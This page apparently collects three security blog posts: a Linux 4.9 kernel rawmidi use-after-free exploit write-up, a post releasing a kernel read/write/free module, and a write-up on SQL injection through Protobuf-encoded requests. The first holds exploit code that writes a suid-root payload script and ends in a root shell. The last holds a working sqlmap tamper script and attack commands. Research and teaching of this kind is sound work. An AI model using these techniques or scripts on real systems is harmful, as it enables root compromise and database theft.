After having allocated everything from the open operation, we can write into the file descriptor like write(fd, &buf, 10). In that way, it will fill 10 bytes into the snd_rawmidi_runtime->buffer and using snd_rawmidi_runtime->appl_ptr it will remember the offset to start writing again later.
In order to write into that buffer, the driver does the following calls: snd_rawmidi_write => snd_rawmidi_kernel_write1 => copy_from_user


The snd_rawmidi_ioctl is responsible to handle IOCTL commands and the one we are interested in is SNDRV_RAWMIDI_IOCTL_PARAMS that calls snd_rawmidi_output_params with user-controllable parameter:

int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
			      struct snd_rawmidi_params * params)
	// [..] few checks
	if (params->buffer_size != runtime->buffer_size) {
		newbuf = kmalloc(params->buffer_size, GFP_KERNEL); //[1]
		if (!newbuf)
			return -ENOMEM;
		oldbuf = runtime->buffer;
		runtime->buffer = newbuf; // [2]
		runtime->buffer_size = params->buffer_size;
		runtime->avail = runtime->buffer_size;
		runtime->appl_ptr = runtime->hw_ptr = 0;
		kfree(oldbuf); //[3]
	// [..]

This IOCTL is crucial for this vulnerability. With this command it’s possible to re-size the internal buffer with an arbitrary value reallocating it[1] and later replace that buffer with the older one [2], that will be freed[3].

Vulnerability Analysis

The vulnerability has been patched by the commit “c13f1463d84b86bedb664e509838bef37e6ea317” that introduced a reference counter on the targeted vulnerable buffer. In order to understand where the vulnerbility lived it’s a good thing to see its patch:

diff --git a/include/sound/rawmidi.h b/include/sound/rawmidi.h
index 5432111c8761..2a87128b3075 100644
--- a/include/sound/rawmidi.h
+++ b/include/sound/rawmidi.h
@@ -76,6 +76,7 @@ struct snd_rawmidi_runtime {
        size_t avail_min;       /* min avail for wakeup */
        size_t avail;           /* max used buffer for wakeup */
        size_t xruns;           /* over/underruns counter */
+       int buffer_ref;         /* buffer reference count */
        /* misc */
        spinlock_t lock;
        wait_queue_head_t sleep;
diff --git a/sound/core/rawmidi.c b/sound/core/rawmidi.c
index 358b6efbd6aa..481c1ad1db57 100644
--- a/sound/core/rawmidi.c
+++ b/sound/core/rawmidi.c
@@ -108,6 +108,17 @@ static void snd_rawmidi_input_event_work(struct work_struct *work)
+/* buffer refcount management: call with runtime->lock held */
+static inline void snd_rawmidi_buffer_ref(struct snd_rawmidi_runtime *runtime)
+       runtime->buffer_ref++;
+static inline void snd_rawmidi_buffer_unref(struct snd_rawmidi_runtime *runtime)
+       runtime->buffer_ref--;
 static int snd_rawmidi_runtime_create(struct snd_rawmidi_substream *substream)
        struct snd_rawmidi_runtime *runtime;
@@ -654,6 +665,11 @@ int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
                if (!newbuf)
                        return -ENOMEM;
+               if (runtime->buffer_ref) {
+                       spin_unlock_irq(&runtime->lock);
+                       kfree(newbuf);
+                       return -EBUSY;
+               }
                oldbuf = runtime->buffer;
                runtime->buffer = newbuf;
                runtime->buffer_size = params->buffer_size;
@@ -962,8 +978,10 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
        long result = 0, count1;
        struct snd_rawmidi_runtime *runtime = substream->runtime;
        unsigned long appl_ptr;
+       int err = 0;
        spin_lock_irqsave(&runtime->lock, flags);
+       snd_rawmidi_buffer_ref(runtime);
        while (count > 0 && runtime->avail) {
                count1 = runtime->buffer_size - runtime->appl_ptr;
                if (count1 > count)
@@ -982,16 +1000,19 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
                if (userbuf) {
                        spin_unlock_irqrestore(&runtime->lock, flags);
                        if (copy_to_user(userbuf + result,
-                                        runtime->buffer + appl_ptr, count1)) {
-                               return result > 0 ? result : -EFAULT;
-                       }
+                                        runtime->buffer + appl_ptr, count1))
+                               err = -EFAULT;
                        spin_lock_irqsave(&runtime->lock, flags);
+                       if (err)
+                               goto out;
                result += count1;
                count -= count1;
+ out:
+       snd_rawmidi_buffer_unref(runtime);
        spin_unlock_irqrestore(&runtime->lock, flags);
-       return result;
+       return result > 0 ? result : err;
 long snd_rawmidi_kernel_read(struct snd_rawmidi_substream *substream,
@@ -1262,6 +1283,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
                        return -EAGAIN;
+       snd_rawmidi_buffer_ref(runtime);
        while (count > 0 && runtime->avail > 0) {
                count1 = runtime->buffer_size - runtime->appl_ptr;
                if (count1 > count)
@@ -1293,6 +1315,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
        count1 = runtime->avail < runtime->buffer_size;
+       snd_rawmidi_buffer_unref(runtime);

Two functions were added: snd_rawmidi_buffer_ref and snd_rawmidi_buffer_unref. They are respectively used to take and remove a reference to the buffer using snd_rawmidi_runtime->buffer_ref when it is copying (snd_rawmidi_kernel_read1) or writing (snd_rawmidi_kernel_write1) into that buffer. But why this was needed? Because read and write operations handled by snd_rawmidi_kernel_write1 and snd_rawmidi_kernel_read1 temporarly unlock the runtime lock during the copying from/to userspace using spin_unlock_irqrestore[1]/spin_lock_irqrestore[2] giving a small race window where the object can be modified during the copy_from_user call:

static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream, const unsigned char __user *userbuf, const unsigned char *kernelbuf, long count) {
	// [..]
			spin_unlock_irqrestore(&runtime->lock, flags); // [1]
			if (copy_from_user(runtime->buffer + appl_ptr,
					   userbuf + result, count1)) {
				spin_lock_irqsave(&runtime->lock, flags);
				result = result > 0 ? result : -EFAULT;
				goto __end;
			spin_lock_irqsave(&runtime->lock, flags); // [2]
	// [..]


If a concurrent thread re-allocate the runtime->buffer using the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl, that thread can lock the object from spin_lock_irq [1] (that has been left unlocked in the small race window given by snd_rawmidi_kernel_write1) and free that buffer[2], making possible to re-allocate an arbitrary object and write on that. Also, the kmalloc[3] in snd_rawmidi_output_params is called with params->buffer_size that is totally user controllable.

int `snd_rawmidi_output_params`(struct snd_rawmidi_substream *substream,
			      struct snd_rawmidi_params * params)
	// [..]
	if (params->buffer_size != runtime->buffer_size) {
		newbuf = kmalloc(params->buffer_size, GFP_KERNEL); // [3]
		if (!newbuf)
			return -ENOMEM;
		spin_lock_irq(&runtime->lock); // [1]
		oldbuf = runtime->buffer;
		runtime->buffer = newbuf;
		runtime->buffer_size = params->buffer_size;
		runtime->avail = runtime->buffer_size;
		runtime->appl_ptr = runtime->hw_ptr = 0;
		kfree(oldbuf); // [3]
	// [..]

What happen if, while a thread is writing into the buffer with copy_from_user, another thread frees that buffer using the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl and reallocates a new arbitrary one? The object is replaced with an new one and the copy_from_user will continue writing into another object (the “victim object”) corrupting its values => User-After-Free (Write).

The really good part about this vulnerability is the “freedom” you can have:

  • It’s possible to call kmalloc with an arbitrary size (and this will be the freed object that we are going to replace to cause a UAF) which means that we can target our favourite slab cache (based on what we need, ofc)
  • We can write as much as we want in the buffer with the write syscall

Extend the Race Time Window

We know we have a small race window with few instructions while copying data from userland to kernel as explained before, but the great news is that we have a copy_from_user that can be suspended arbitrarly handling page fault in user-space ! Since I was exploiting the vulnerability in a 4.9 kernel (4.9.223) and hence userfaultd is still not unprivileged as in >5.11, we can still use it to extend our race window and have the necessary time to re-allocate a buffer!

Exploitation Plan

We stated that we are going to use the userfaultd technique to extend the time window. If you are new to this technique is well explained here, in this video (you can use substitles) and here. To summarize: you can handle page faults from user-land, temporarly blocking kernel execution while handling the page fault. If we mmap a block of memory with MAP_ANONYMOUS flag, the memory will be demand-zero paged, meaning that it’s not yet allocated and we can allocate it via userfaultd.
The idea using this technique is:

  • Initialize the runtime->buffer with open => This will allocate the buffer with 4096 size (that will land in kmalloc-4096)
  • Send SNDRV_RAWMIDI_IOCTL_PARAMS ioctl command in order to re-allocate the buffer with our desired size (e.g. 30 wil land in kmalloc-32)
  • Allocate with mmap a demand-zero paged (MAP_ANON) and initialize userfaultd to handle its page fault
  • write to the rawmidi file descriptor using our previously allocated mmaped memory => This will trigger the userland page fault in copy_from_user
  • While the kernel thread is suspended waiting for the userland page fault we can send again the SNDRV_RAWMIDI_IOCTL_PARAMS in order to free the current runtime->buffer
  • We allocate an object in, for example, kmalloc-32 and if we did some spray before on that cache it will take the place of the previous freed runtime->buffer
  • We release the page fault from userland and the copy_from_user will continue writing its data (totally in user control) to the new allocated object

With this primitive, we can forges arbitrary objects with arbitrary size (specified in the write syscall), arbitrary contentarbitrary offset (since we can trigger userfaultd between two pages as demostrated later on) and arbitrary cache (we can control the size allocation in the SNDRV_RAWMIDI_IOCTL_PARAMS ioctl).
As you can deduce, we have a really great and powerful primitive !

Information Leak

Victim Object

We are going to use what we previously explained in the “Exploitation Plan” section to leak an address that we will re-use to have an arbitrary write. Since we can choose which cache trigger the UAF on (and that’s gold from an exploitation point of view) I choose to leak the shm_file_data->ns pointer that points to init_ipc_ns in the kernel .data section and it lives in kmalloc-32 (I also used the same function to spray the kmalloc-32 cache):

void alloc_shm(int i)
	int shmid[0x100]     = {0};
	void *shmaddr[0x100] = {0};
    shmid[i] = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600);
    if (shmid[i]  < 0) errExit("shmget");
    shmaddr[i] = (void *)shmat(shmid[i], NULL, SHM_RDONLY);
    if (shmaddr[i] < 0) errExit("shmat");

From that pointer, we will deduce the pointer of modprobe_path in order to use that technique later to elevate our privileges.


struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */

struct msg_msgseg {
	struct msg_msgseg *next;
	/* the next part of the message follows immediately */

In order to leak that address, however, we have to compromise some other object in kmalloc-32, maybe a length field that would read after its own object. For that case, msg_msg is our perfect match because it has a length field specified in its msg_msg->m_ts and it can be allocated in almost any cache starting from kmalloc-32 to kmalloc-4096, with just one downside: The minimun allocation for the msg_msg struct is 48 (sizeof(struct msg_msg)) and it can lands minimun at kmalloc-64.
If you want to read more about this structure you can checkout Fire of Salvation WriteupWall Of Perdition and the kernel source code.
However, when a message is sent using msgsnd with size more than DATALEN_MSG (((size_t)PAGE_SIZE-sizeof(struct msg_msg))) that is 4096-48, a segment (or multiple segments if needed) is allocated, and the message is splitted between the msg_msg (the payload is just after the struct headers) and the msg_msgseg, with the total size of the message specified in msg_msg->m_ts.

In order to allocate our target object in kmalloc-32 we have to send a message with size: ( ( 4096 – 48 ) + 10 ).

  • The msg_msg structure will be allocated in kmalloc-4096 and the first (4096 – 48) bytes will be written in the msg_msg structure.
  • To allocate the remaining 10 bytes, a segment msg_msgseg will be allocated in kmalloc-32

With these conditions, we can forge the msg_msg structure in kmalloc-4096 overwriting its m_ts value with our UAF and with msgrcv we can receive a message that will contains values past our segment allocated in kmalloc-32 (including our targeted init_ipc_ns pointer).

Dealing with offsets

However, we want to overwrite the m_ts value without overwriting anything else in the msg_msg structure, how we can do that?
If you remember, I said we can overwrite chunks with arbitrary size, content and offset. If we create a mmap memory with size PAGE_SIZE * 2 (two pages) and we handle the page fault only for the second page, we can start writing into the original runtime->buffer and trigger the page fault when it receives the msg_msg->m_ts offset (0x18). Now that the kernel thread is blocked, it’s possible to replace the object with msg_msg and when the copy_from_user resumes, it will starts writing exactly at the msg_msg->m_ts value the remaining bytes. The size we are writing into the file descriptor is (0x18 + 0x2) since the first 0x18 bytes will be used to land at the exact offset and the 2 remaining bytes will write 0xffff in msg_msg->m_ts. The concept is also explained in the following picture:

Now from the received message from msgrcv we can retrieve the init_ipc_ns pointer from shm_file_data and we can deduce the modprobe_path address calculating its offset and proceed with the arbitrary write phase.

Arbitrary Write

In order to write at arbitrary locations we are using the same userfault technique described above but instead of targeting msg_msg we will use the Vectored I/O (pipe + iovec) primitive. This primitive has been fixed in kernel 4.13 with copyin and copyout wrappers, with an access_ok addition. This technique has been widely used exploiting the Android Binder CVE-2019-2215 and is well detailed here and here.

The idea is to trigger the UAF once again but targeting the iovec struct:

struct iovec
	void __user *iov_base;	/* BSD uses caddr_t (1003.1g requires void *) */
	__kernel_size_t iov_len; /* Must be size_t (1003.1g) */

The minimun allocation for iovec occurs with sizeof(struct iovec) * 9 or 16 * 9 (144) that will land at kmalloc-192 (otherwise it is stored in the stack). However I choose to allocate 13 vectors using readv to make the object land in kmalloc-256.

    int pipefd[2];
    // [...]
    struct iovec iov_read_buffers[13] = {0};
    char read_buffer0[0x100];
    memset(read_buffer0, 0x52, 0x100);
    iov_read_buffers[0].iov_base = read_buffer0;
    iov_read_buffers[0].iov_len= 0x10;
    iov_read_buffers[1].iov_base = read_buffer0;
    iov_read_buffers[1].iov_len= 0x10;
    iov_read_buffers[8].iov_base = read_buffer0;
    iov_read_buffers[8].iov_len= 0x10;
    iov_read_buffers[12].iov_base = read_buffer0;
    iov_read_buffers[12].iov_len= 0x10;

        ssize_t readv_res = readv(pipefd[0], iov_read_buffers, 13); // 13 * 16 = 208 => kmalloc-256

The readv is a blocking call that stays (does not free) the object in the kernel so that we can corrupt it using our UAF and re-use it later with our arbitrary modified content. If we corrupt the iov_base of an iovec structure we can write at arbitrary kernel addresses with a write syscall since it is uses the unsafe __copy_from_user (same as copy_from_user but without checks).

Our idea is:

  • Resize the runtime->buffer with SNDRV_RAWMIDI_IOCTL_PARAMS in order to lands intokmalloc-256 with a size greater than 192
  • write into the file descriptor specifycing a demanded-zero paged memory (MAP_ANON) so that copy_from_user will stop its execution waiting for our user-land page fault handler
  • While the kernel thread is waiting, free the buffer using again the re-size ioctl command SNDRV_RAWMIDI_IOCTL_PARAMS
  • Allocate the iovec struct using readv that will replace the previously allocated runtime->buffer
  • Resume the kernel execution releasing the page fault handler. Now the copy_from_user will start to write into the iovec structure and we will overwrite iov[1].iov_base with the modprobe_path address.

Now, in order to overwrite the modprobe_path value we just have to write our arbitrary content using the write syscall into pipe[0]. In the released exploit I overwrote the second iov entry (iov[1]) using the same technique described before with adjacent pages. However, it’s also possible to directly overwrite the first iov[0].iov_base.

Nice ! Now we have overwritten modprobe_path with /tmp/x and .. it’s time to pop a shell !

modprobe_path & uid=0

If you are not familiar with modprobe_path I suggest you to check out Exploiting timerfd_ctx Objects In The Linux Kernel and the man page.
To summarize, modprobe_path is a global variable with a default value of /sbin/modprobe used by call_usermodehelper_exec to execute a user-space program in case a program with an unkown header is executed.
Since we have overwritten modprobe_path with /tmp/x, when a file with an unknown header is executed, our controllable script is executed as root.

These are the exploit functions that prepares and later executes a suid shell:

void prep_exploit(){
    system("echo '#!/bin/sh' > /tmp/x");
    system("echo 'touch /tmp/pwneed' >> /tmp/x");
    system("echo 'chown root: /tmp/suid' >> /tmp/x");
    system("echo 'chmod 777 /tmp/suid' >> /tmp/x");
    system("echo 'chmod u+s /tmp/suid' >> /tmp/x");
    system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /tmp/nnn");
    system("chmod +x /tmp/x");
    system("chmod +x /tmp/nnn");

void get_root_shell(){
    system("/tmp/nnn 2>/dev/null");
    system("/tmp/suid 2>/dev/null");

int main(){
	// [..] exploit stuff
	get_root_shell(); // pop a root shell

What the exploit does is simply create the /tmp/x binary that will suid as root a file dropped in /tmp/suid and create a file with an unknown header (/tmp/nnn) that will trigger the executon as root of /tmp/x from call_usermodehelper_exec. After that, the /tmp/suid gives root privileges and spawns a root shell.


/ $ uname -a                                   
Linux (none) 4.9.223 #3 SMP Wed Jun 1 23:15:02 CEST 2022 x86_64 GNU/Linux 
/ $ id
uid=1000(user) gid=1000 groups=1000
/ $ /main 
[*] Starting exploitation ..
[+] userfaultfd registered
[*] First write to init substream..
[*] Resizing buffer_size to 4096 ..
[*] snd_write triggered (should fault) 
[*] Freeing buf using SNDRV_RAWMIDI_IOCTL_PARAMS
[+] Page Fault triggered for 0x5551000!
s -l[*] Replacing freed obj with msg_msg .
[*] Waiting for userfaultd to finish ..
[*] Page fault thread terminated
[+] Page fault lock released
[+] init_ipc_ns @0xffffffff81e8d560
[+] calculated modprobe_path @0xffffffff81e42a00
[+] Starting the arbitrary write phase ..
[*] Closing and reopening re-opening rawmidi fd ..
[+] userfaultfd registered
[*] First write to init substream..
[*] Resizing buffer_size to land into kmalloc-256 ..
[*] snd_write triggered (should fault) 
[+] Page Fault triggered for 0x7771000!
[*] Waiting for readv ..
[*] Page fault thread terminated
[+] Page fault lock released
[*] Writing into the pipe ..
[*] write = 24
[+] enjoy your r00t shell [:
/ # id
uid=0(root) gid=0 groups=1000
/ #


I illustrated my experience on finding a public vulnerability using public resources to practise some linux kernel exploitation. Once identified a good candiate, I developed the exploit for a 4.9 kernel achieving arbitrary read and write. With tese primitives, a root shell was spawned.

You can find the whole exploit here:


1 33 %
0 0 %
1 33 %
0 0 %
0 0 %
1 33 %

KRWX: Kernel Read Write Execute

12 March 2022 at 15:41
Read Time:5 Minute, 33 Second


Github project:

During the last few months/year I was studying and approaching the Kernel Exploitation subject and during this journey I developed few tools that assissted me (and currently assist) on better understanding specific topics. Today I want to release my favourine one: KRWX (Kernel Read Write Execute). It is a simple LKM (Linux Kernel Module) that lets you play with kernel memory, allocate and free kernel objects directly from user-land!


The main goal of this tool is to use kernel functions from userland (from C code) in order to avoid slower kernel debugging and developing of kernel modules to demostrate specific vulnerabilities (instead, you can emulate them with provided IOCTLs). Also, it can assist the exploitation phase.
These are the project main features (all these features are accessible from a low level user from user-land):

  • Read and write into kernel memory
  • Read entire blocks of memory
  • Arbitrary allocate objects directly calling kmalloc
  • Arbitrary kfree objects (and also free arbitrary addresses, if you want)
  • Allocate/free multiple objects
  • Log every copy_[from|to]_user/ kmalloc/kfree called by the KRWX module through hooking (readable from dmesg).

Mainly, a more powerful read and write primitive :]


Initially I was writing this module to study the SLUB memory allocator in Linux by allocating, freeing and re-allocating arbitrary chunks easily from an userland process. That automatically leads to study also some exploitation techniques that, with this module, I found a lot easier to understand since you can easily play with kernel memory as you are the god of your system. Then I started to heavily use it for multiple purposes and that’s the reason why I’m sharing it.


These are some exported functions:

  • void* kmalloc(size_t arg_size, gfp_t flags) -> Allocate a chunk with specific size and flag options.
  • int kfree(void* address) -> Free arbitrary chunks by their address (also, you can free arbitrary memory).
  • unsigned long int kread64(void* address) -> Read 8 bytes of memory at address.
  • int kwrite64(void* address, uint64_t value) -> Write 8 bytes specified by value into address.
  • void read_memory(void* start_address, size_t size) -> Read size amount of memory starting from start_address.

And, since one of my favourite hobby is overengineer and I’m lazy enough to do not want to write loops everytime:

  • void multiple_kmalloc(void** array, uint32_t n_objs, uint32_t size) -> Allocate n_objs number of objects with specified size and return addresses in array.
  • void multiple_kfree(void** array, uint64_t to_free[], uint64_t to_free_size) -> Free specified addresses in to_free from array (to_free_size is the size of the to_free array). If you’re interested in the source code feel free to check out the github project.


Allocate, free and read arbitrary chunks

You can find the full source code in example/01.c. Here will follows some snippets and a little walkthrough.

First, include the external library and call its initialization function (init_krwx):

#include "./lib/krwx.h"

int main(){

So, 10 chunks with size 256 are allocated using multiple_kmalloc, and the memory of the 7th allocation is read using read_memory after writing 0x4141414141414141 at its first bytes:

void* chunks[10];
multiple_kmalloc(&chunks, 10, 256);
kwrite64(chunks[7], 0x4141414141414141);
read_memory(chunks[7], 0x10);

The indexes 3, 4 and 7 of the chunks array are freed using multiple_kfree:

uint64_t to_free[] = {3, 4, 7};
multiple_kfree(&chunks, &to_free, ( sizeof(to_free) / sizeof(uint64_t) ) );

Once they are freed, new chunks with the same size are allocated and initialized with 0x4343434343434343, and the memory of the 7h freed chunk is displayed using read_memory again:

kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
read_memory(chunks[7], 0x10);

The result is:

[*] Allocating 10 chunks with size 256
[*] Allocated @0xffffffc00503b900
[*] Allocated @0xffffffc00503b600
[*] Allocated @0xffffffc00503b100
[*] Allocated @0xffffffc00503bc00
[*] Allocated @0xffffffc00503b400
[*] Allocated @0xffffffc00503b000
[*] Allocated @0xffffffc00503b500
[*] Allocated @0xffffffc00503b800
[*] Allocated @0xffffffc00503ba00
[*] Allocated @0xffffffc00503bd00
0xffffffc00503b800:     0x4141414141414141 0xffffffc0001a8928
[*] Freeing @0xffffffc00503bc00
[*] Freeing @0xffffffc00503b400
[*] Freeing @0xffffffc00503b800
0xffffffc00503b800:     0x4343434343434343 0xffffffc0001a8928

With few lines of code has been demostrated how our 7th chunk has been replaced with a new one after it has been freed (the read_memory targeted the chunks[7]).
As simple as it is, it has been written for demonstration purposes.


To simulate a UAF scenario it’s simple as few lines of code:

void* chunk = kmalloc(<SIZE>, <FLAGS>);
// Allocate your target chunk
// Simulate UAF using k[write|read]64()

For example, if we want to simulate an attack scenario where we want to replace our vulnerable freed chunk with a target object (for example an iovec struct) we can allocate a chunk with kmalloc and later kfree it just before allocating the target structure:

// Allocate the vulnerable object
void* chunk = kmalloc(150, _GFP_KERN);
// Allocate target object
struct iovec iov[10] = {0};
char iov_buf[0x100];
iov[0].iov_base = iov_buf;
iov[0].iov_len = 0x1000;
iov[1].iov_base = iov_buf;
iov[1].iov_len = 0x1337;
int pp[2];
    kfree(chunk); // Freeing the chunk just before allocating the iovec
    readv(pp[0], iov, 10); // allocate iovec and blocks (keeping the object in the kernel) 
sleep(1); // Give time to the child process
read_memory(chunk, 0x40);

Then, with read_memory we can show the block of memory in our interest and as you can see from the following output, our arbitrary allocated/freed object has been replaced with the target object:

Allocated chunk @0xffffffc0052c5a00
0xffffffc0052c5a00:     0x0000007fd311ff58 0x0000000000001000
0xffffffc0052c5a10:     0x0000007fd311ff58 0x0000000000001337
0xffffffc0052c5a20:     0x0000000000000000 0x0000000000000000
0xffffffc0052c5a30:     0x0000000000000000 0x0000000000000000

Instead of just print the content, you can simulate a UAF read/write using k[read|write] and play with it.

The full code of this example can be found in client/example/02.c


To compile the module change the K variable in the Makefile with your compiled kernel root directory and compile with make, then insmod.


Personally, I used it to study the SLUB allocator, understand UAF/Heap Overflows/Double Free/userfaultd and some hardening features in the kernel, but it can assist the exploitation phase too or more. Blog posts on some Kernel vulnerabilities and their attack methodologies will follow these months and this module will come useful to demonstrate them. So, stay tuned and enjoy !

PS. The “Execute” part of the name will be a future implementation to control pc/rip.

0 0 %
0 0 %
3 100 %
0 0 %
0 0 %
0 0 %

🇬🇧 Tortellini in Brodobuf



Many developers believe that serializing traffic makes a web application more secure, as well as faster. That would be easy, right? The truth is that security implications remain if the backend code does not adopt adequate defensive measures, regardless of how data is exchanged between the client and server. In this article we will show you how the serialization can’t stop an attacker if the web application is vulnerable at the root. During our activity the application was vulnerable to SQL injection, we will show how to exploit it in case the communications are serialized with Protocol Buffer and how to write a SQLMap tamper for it.


Hello friends… Hello friends… Here is 0blio and MrSaighnal, we didn’t want to leave all the space to our brother last, so we decided to do some hacking. During an activity on a web application we tripped over a weird target behavior, in fact during HTTP interception the data appeared encoded in base64, but after decoding the response, we noticed the data was in a binary format. Thanks to some information leakage (and also by taking a look at the application/grpc header) we understood the application used a Protocol buffer (Protobuf) implementation. Looking over the internet we found poor information regarding Protobuf and its exploitation methodology so we decided to document our analysis process here. The penetration testing activity was under NDA so in order to demonstrate the functionality of Protobuf we developed an exploitable web application (APTortellini copyrighted 😊).

Protobuf primer

Protobuf is a data serialization format released by Google in 2008. Differently from other formats like JSON and XML, Protobuf is not human friendly, due to the fact that data is serialized in a binary format and sometimes encoded in base64. Protobuf is a format developed to improve communication speed when used in conjunction with gRPC (more on that in a moment). This is a data exchange format originally developed for internal use as an open source project (partially under the Apache 2.0 license). Protobuf can be used by application written in various programming languages, such as C#, C++, Go, Objective-C, Javascript, Java etc… Protobuf is used, among other things, in combination with HTTP and RPC (Remote Procedure Calls) for local and remote client-server communication, in particular for the description of the interfaces needed for this purpose. The protocol suite is also defined by the acronym gRPC.

For more information regarding Protobuf our best advice is to read the official documentation.

Step 1 - Playing with Protobuf: Decoding

Okay, so… our application comes with a simple search form that allows searching for products within the database.


Searching for “tortellini”, we obviously get that the amount is 1337 (badoom tsss):


Inspecting the traffic with Burp we notice how search queries are sent towards the /search endpoint of the application:


And that the response looks like this:


At first glance, it might seem that the messages are simply base64 encoded. Trying to decode them though we noticed that the traffic is in binary format:



Inspecting it with xxd we can get a bit more information.


To make it easier for us to decode base64 and deserialize Protobuf, we wrote this simple script:


import base64
from subprocess import run, PIPE

while 1:
        decoded_bytes = base64.b64decode(input("Insert string: "))[5:]
        process = run(['protoc', '--decode_raw'], stdout=PIPE, input=decoded_bytes)

        print (str(process.stdout.decode("utf-8").strip()))
    except KeyboardInterrupt:

The script takes an encoded string as input, strips away the first 5 padding characters (which Protobuf always prepends), decodes it from base64 and finally uses protoc (Protobuf’s own compiler/decompiler) to deserialize the message.

Running the script with our input data and the returned output data we get the following output:


As we can see, the request message contains two fields:

  • Field 1: String to be searched within the database.
  • Field 2: An integer always equivalent to 0 Instead, the response structure includes a series of messages containing the objects found and their respective amount.

Once we understood the structure of the messages and their content, the challenge is to write a definition file (.proto) that allows us to get the same kind of output.

Step 2 - Suffering with Protobuf: Encoding

After spending some time reading the python documentation and after some trial and error we have rewritten a message definition similar to those that our target application should use.

syntax = "proto2";
package searchAPI;

message Product {

        message Prod {
                required string name = 1;
                optional int32 quantity = 2;

        repeated Prod product = 1;

the .proto file can be compiled with the following command:

protoc -I=. --python_out=. ./search.proto

As a result we got a library to be imported in our code to serialize/deserialize our messages which we can see in the import of the script (import search pb2).


import struct
from base64 import b64encode, b64decode
import search_pb2
from subprocess import run, PIPE

def encode(array):
    Function to serialize an array of tuples
    products = search_pb2.Product()
    for tup in array:
        p = products.product.add() = str(tup[0])
        p.quantity = int(tup[1])

    serializedString = products.SerializeToString()
    serializedString = b64encode(b'\x00' + struct.pack(">I", len(serializedString)) + serializedString).decode("utf-8")

    return serializedString

test = encode([('tortellini', 0)])
print (test)

The output of the string “tortellini” is the same of our browser request, demonstrating the encoding process worked properly.


Step 3 - Discovering the injection

To discover the SQL injection vulnerability we opted for manual inspection. We decided to send the single quote ‘ in order to induce a server error. Analyzing the web application endpoint:


we could guess that the SQL query is something similar to:

SELECT id, product, amount FROM products WHERE product LIKE %PAYLOAD%;

It means that injecting a single quote within the request we could induce the server to process the wrong query:

SELECT id, product, amount FROM products WHERE product LIKE %%;

and then producing a 500 server error. To manually check this we had to serialize our payload with the Protobuf compiler and before sending it encode it in base64. We used the script from step 2 by modifying the following lines:

test = encode([("'", 0)])

after we run the script we can see the following output:


By sending the generated serialized string as payload to the vulnerable endpoint:


the application returns HTTP 500 error indicating the query has been broken,


Since we want to automate the dump process sqlmap was a good candidate for this task because of its tamper scripting features.

Step 4 - Coding the tamper

Right after we understood the behaviour of Protobuf encoding process, coding a sqlmap tamper was a piece of cake.

#!/usr/bin/env python

from import kb
from lib.core.enums import PRIORITY

import base64
import struct
import search_pb2

__priority__ = PRIORITY.HIGHEST

def dependencies():

def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        # Instantiating objects
        products = search_pb2.Product()
        p = products.product.add() = payload
        p.quantity = 1

        # Serializing the string
        serializedString = products.SerializeToString()
        serializedString = b'\x00' + struct.pack(">I",len(serializedString)) + serializedString

        # Encoding the serialized string in base64
        b64serialized = base64.b64encode(serializedString).decode("utf-8")
        retVal = b64serialized

    return retVal

To make it work we moved the tamper in the sqlmap tamper directory /usr/share/sqlmap/tamper/ along with the Protobuf compiled library.

Here the logic behind the tamper workings:


Step 5 - Exploiting Protobuf - Control is an illusion

We intercepted the HTTP request and we added the star to indicate to sqlmap where to inject the code.

GET /search/* HTTP/1.1
Host: brodostore
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


After we saved the request in the test.txt file, we then run sqlmap with the following command:

sqlmap -r test.txt --tamper brodobug --technique=BT --level=5 --risk=3


Why is it slow?

Unfortunately sqlmap is not able to understand the Protobuf encoded responses. Because of that we decided to take the path of the Boolean Blind SQL injection. In other words we had to “bruteforce” the value of every character of every string we wanted to dump using the different response the application returns when the SQLi succeeds. This approach is really slow compared to other SQL injection technique, but for this test case it was enough to show the approach to exploit web applications which implement Protobuf. In the future, between one plate of tortellini and another we could decide to implement mechanism that decode the responses via the *.proto struct and then expand it to other attack paths… but for now we are satisfied with that! Until next time folks!